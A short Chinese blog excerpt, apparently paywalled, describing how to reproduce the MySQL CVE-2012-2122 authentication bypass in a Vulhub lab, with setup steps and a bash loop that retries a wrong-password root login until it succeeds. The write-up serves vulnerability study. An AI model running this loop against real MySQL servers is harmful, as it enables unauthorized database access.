搭建 进入vulhub对应mysql漏洞环境,执行如下命令即可 docker-compose up -d 如上则启动成功 环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。 漏洞复现 在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录: for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
本文档详细介绍了如何复现MySQL的CVE-2012-2122漏洞。首先,通过Vulhub搭建了MySQL 5.5.23的漏洞环境,启动后服务监听3306端口,使用默认密码123456可以登录。然后,在不知晓正确密码的情况下,通过特定的bash命令,尝试一定次数后可以无密码成功登录数据库。文章还提供了相关的POC代码供参考。
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
